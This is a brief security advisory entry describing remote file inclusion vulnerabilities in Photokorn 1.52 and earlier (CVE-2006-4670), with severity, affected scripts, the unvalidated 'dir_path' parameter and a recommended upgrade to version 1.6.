Release DateJan 17, 2007 |
Severitylow |
ImpactSystem compromise: remote code execution. |
DescriptionThis indicates a possible attempt to exploit one of several vulnerabilities that have been identified in Photokorn.These vulnerabilities are due to input validation errors in various scripts (for example "includes/cart.inc.php" and "extras/ext_cats.php") that do not validate the "dir_path" parameter. They could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server. |
Affected ProductsPhotokorn version 1.52 and prior. |
Recommended ActionsUpgrade to version 1.6 :http://www.telekorn.com/cms/front_content.php |
Coverage IPS
VCM |
Common Vulnerabilities and Exposures (CVE)CVE-2006-4670 |
Reference/shttp://www.securityfocus.com/bid/19914 (BugTraq) |
